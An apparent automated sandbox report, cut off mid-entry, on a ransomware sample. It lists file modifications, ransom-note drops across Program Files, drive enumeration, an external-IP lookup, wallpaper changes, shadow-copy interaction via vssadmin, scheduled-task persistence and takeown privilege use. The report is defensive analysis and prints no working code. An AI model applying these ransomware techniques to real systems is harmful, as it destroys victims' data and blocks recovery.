C:\Users\Admin\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\266EQP1S\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AS4I30IR\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Music\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2Y0HPGOE\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JP38OXIN\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Documents\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates connected drives 3 TTPs 44 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
Gi44eNKg64.exe42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exedescription ioc process File opened (read-only) \??\A: Gi44eNKg64.exe File opened (read-only) \??\H: Gi44eNKg64.exe File opened (read-only) \??\M: Gi44eNKg64.exe File opened (read-only) \??\X: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\T: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\O: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\E: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\G: Gi44eNKg64.exe File opened (read-only) \??\K: Gi44eNKg64.exe File opened (read-only) \??\L: Gi44eNKg64.exe File opened (read-only) \??\N: Gi44eNKg64.exe File opened (read-only) \??\Y: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\S: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\P: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: Gi44eNKg64.exe File opened (read-only) \??\E: Gi44eNKg64.exe File opened (read-only) \??\I: Gi44eNKg64.exe File opened (read-only) \??\N: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\M: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\K: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\J: Gi44eNKg64.exe File opened (read-only) \??\P: Gi44eNKg64.exe File opened (read-only) \??\V: Gi44eNKg64.exe File opened (read-only) \??\W: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\H: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\B: Gi44eNKg64.exe File opened (read-only) \??\Q: Gi44eNKg64.exe File opened (read-only) \??\T: Gi44eNKg64.exe File opened (read-only) \??\U: Gi44eNKg64.exe File opened (read-only) \??\Q: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\I: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\O: Gi44eNKg64.exe File opened (read-only) \??\S: Gi44eNKg64.exe File opened (read-only) \??\X: Gi44eNKg64.exe File opened (read-only) \??\Y: Gi44eNKg64.exe File opened (read-only) \??\Z: Gi44eNKg64.exe File opened (read-only) \??\Z: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\V: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\R: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\U: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\L: 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened (read-only) \??\W: Gi44eNKg64.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 8 myexternalip.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\blodNw7J.bmp" reg.exe -
Drops file in Program Files directory 64 IoCs
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exedescription ioc process File opened for modification C:\Program Files\Mozilla Firefox\postSigningData 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\main.css 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\et.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_ja_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chuuk 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\license.html 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\en-US\chkrzm.exe.mui 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Vostok 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\dumpmeta.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_zh_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\amd64\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sw.pak 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.common_2.10.1.v20140901-1043.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.jasper.glassfish_2.2.2.v201205150955.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\SwitchRedo.emf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.lnk 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\sd\icecast.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Hobart 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Purble Place\en-US\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\kinit.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\rmid.exe 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\vlc.mo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\FreeCell\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novosibirsk 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ho_Chi_Minh 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.win32.nl_ja_4.4.0.v20140623020002.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-spi-quicksearch.xml 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Google\Update\Install\{D9005A2B-BC2A-4153-8911-AE3B3F543790}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Purble Place\es-ES\PurblePlace.exe.mui 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2540 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exeGi44eNKg64.exepid process 1808 powershell.exe 572 Gi44eNKg64.exe 572 Gi44eNKg64.exe 572 Gi44eNKg64.exe 572 Gi44eNKg64.exe 572 Gi44eNKg64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
Gi44eNKg64.exepid process 572 Gi44eNKg64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeGi44eNKg64.exevssvc.exetakeown.exetakeown.exeWMIC.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exedescription pid process Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 572 Gi44eNKg64.exe Token: SeLoadDriverPrivilege 572 Gi44eNKg64.exe Token: SeBackupPrivilege 4920 vssvc.exe Token: SeRestorePrivilege 4920 vssvc.exe Token: SeAuditPrivilege 4920 vssvc.exe Token: SeTakeOwnershipPrivilege 3160 takeown.exe Token: SeTakeOwnershipPrivilege 4788 takeown.exe Token: SeIncreaseQuotaPrivilege 2484 WMIC.exe Token: SeSecurityPrivilege 2484 WMIC.exe Token: SeTakeOwnershipPrivilege 2484 WMIC.exe Token: SeLoadDriverPrivilege 2484 WMIC.exe Token: SeSystemProfilePrivilege 2484 WMIC.exe Token: SeSystemtimePrivilege 2484 WMIC.exe Token: SeProfSingleProcessPrivilege 2484 WMIC.exe Token: SeIncBasePriorityPrivilege 2484 WMIC.exe Token: SeCreatePagefilePrivilege 2484 WMIC.exe Token: SeBackupPrivilege 2484 WMIC.exe Token: SeRestorePrivilege 2484 WMIC.exe Token: SeShutdownPrivilege 2484 WMIC.exe Token: SeDebugPrivilege 2484 WMIC.exe Token: SeSystemEnvironmentPrivilege 2484 WMIC.exe Token: SeRemoteShutdownPrivilege 2484 WMIC.exe Token: SeUndockPrivilege 2484 WMIC.exe Token: SeManageVolumePrivilege 2484 WMIC.exe Token: 33 2484 WMIC.exe Token: 34 2484 WMIC.exe Token: 35 2484 WMIC.exe Token: SeIncreaseQuotaPrivilege 2484 WMIC.exe Token: SeSecurityPrivilege 2484 WMIC.exe Token: SeTakeOwnershipPrivilege 2484 WMIC.exe Token: SeLoadDriverPrivilege 2484 WMIC.exe Token: SeSystemProfilePrivilege 2484 WMIC.exe Token: SeSystemtimePrivilege 2484 WMIC.exe Token: SeProfSingleProcessPrivilege 2484 WMIC.exe Token: SeIncBasePriorityPrivilege 2484 WMIC.exe Token: SeCreatePagefilePrivilege 2484 WMIC.exe Token: SeBackupPrivilege 2484 WMIC.exe Token: SeRestorePrivilege 2484 WMIC.exe Token: SeShutdownPrivilege 2484 WMIC.exe Token: SeDebugPrivilege 2484 WMIC.exe Token: SeSystemEnvironmentPrivilege 2484 WMIC.exe Token: SeRemoteShutdownPrivilege 2484 WMIC.exe Token: SeUndockPrivilege 2484 WMIC.exe Token: SeManageVolumePrivilege 2484 WMIC.exe Token: 33 2484 WMIC.exe Token: 34 2484 WMIC.exe Token: 35 2484 WMIC.exe Token: SeTakeOwnershipPrivilege 3516 takeown.exe Token: SeTakeOwnershipPrivilege 1676 takeown.exe Token: SeTakeOwnershipPrivilege 3484 takeown.exe Token: SeTakeOwnershipPrivilege 2892 takeown.exe Token: SeTakeOwnershipPrivilege 3412 takeown.exe Token: SeTakeOwnershipPrivilege 4940 takeown.exe Token: SeTakeOwnershipPrivilege 1788 takeown.exe Token: SeTakeOwnershipPrivilege 2764 takeown.exe Token: SeTakeOwnershipPrivilege 3904 takeown.exe Token: SeTakeOwnershipPrivilege 852 takeown.exe Token: SeTakeOwnershipPrivilege 4400 takeown.exe Token: SeTakeOwnershipPrivilege 4152 takeown.exe Token: SeTakeOwnershipPrivilege 1528 takeown.exe Token: SeTakeOwnershipPrivilege 4864 takeown.exe Token: SeTakeOwnershipPrivilege 2956 takeown.exe Token: SeTakeOwnershipPrivilege 3640 takeown.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.execmd.execmd.execmd.execmd.exewscript.execmd.exedescription pid process target process PID 2456 wrote to memory of 2068 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2068 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2068 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2068 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2504 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe NWmz9gZP.exe PID 2456 wrote to memory of 2504 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe NWmz9gZP.exe PID 2456 wrote to memory of 2504 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe NWmz9gZP.exe PID 2456 wrote to memory of 2504 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe NWmz9gZP.exe PID 2456 wrote to memory of 2320 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2320 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2320 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2320 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2320 wrote to memory of 1808 2320 cmd.exe powershell.exe PID 2320 wrote to memory of 1808 2320 cmd.exe powershell.exe PID 2320 wrote to memory of 1808 2320 cmd.exe powershell.exe PID 2320 wrote to memory of 1808 2320 cmd.exe powershell.exe PID 2456 wrote to memory of 948 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 948 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 948 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 948 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2188 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2188 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2188 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2188 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2204 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2204 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2204 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2456 wrote to memory of 2204 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe cmd.exe PID 2188 wrote to memory of 588 2188 cmd.exe wscript.exe PID 2188 wrote to memory of 588 2188 cmd.exe wscript.exe PID 2188 wrote to memory of 588 2188 cmd.exe wscript.exe PID 2188 wrote to memory of 588 2188 cmd.exe wscript.exe PID 948 wrote to memory of 1564 948 cmd.exe reg.exe PID 948 wrote to memory of 1564 948 cmd.exe reg.exe PID 948 wrote to memory of 1564 948 cmd.exe reg.exe PID 948 wrote to memory of 1564 948 cmd.exe reg.exe PID 2204 wrote to memory of 3748 2204 cmd.exe cacls.exe PID 2204 wrote to memory of 3748 2204 cmd.exe cacls.exe PID 2204 wrote to memory of 3748 2204 cmd.exe cacls.exe PID 2204 wrote to memory of 3748 2204 cmd.exe cacls.exe PID 948 wrote to memory of 2404 948 cmd.exe reg.exe PID 948 wrote to memory of 2404 948 cmd.exe reg.exe PID 948 wrote to memory of 2404 948 cmd.exe reg.exe PID 948 wrote to memory of 2404 948 cmd.exe reg.exe PID 2204 wrote to memory of 1072 2204 cmd.exe takeown.exe PID 2204 wrote to memory of 1072 2204 cmd.exe takeown.exe PID 2204 